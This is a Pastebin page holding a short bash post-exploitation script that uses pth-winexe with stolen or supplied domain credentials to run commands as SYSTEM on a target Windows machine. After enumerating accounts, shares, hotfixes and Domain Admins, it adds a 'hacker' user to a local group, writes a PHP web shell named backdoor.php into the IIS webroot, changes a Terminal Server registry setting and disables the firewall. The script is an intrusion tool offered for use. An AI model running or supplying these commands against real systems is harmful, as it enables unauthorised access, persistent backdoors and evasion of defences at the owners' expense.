Advertisement
opexxx

win-post-enum.sh

Jun 12th, 2017
296
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.38 KB | None | 0 0
  1. #!/bin/bash
  2. TARGET=$1
  3. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
  4. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
  5. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
  6. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
  7. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
  8. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
  9. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
  10. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
  11. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "powershell.exe -command Get-Hotfix"
  12. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net user hacker PASSWORD /add"
  13. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs /add hacker"
  14. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net group 'Domain Admins' /domain"
  15. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "echo ^< ?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\backdoor.php"
  16. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fAllowToGetHelp /t REG_DWORD /d 1 /f"
  17. pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netsh firewall set opmode disable"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement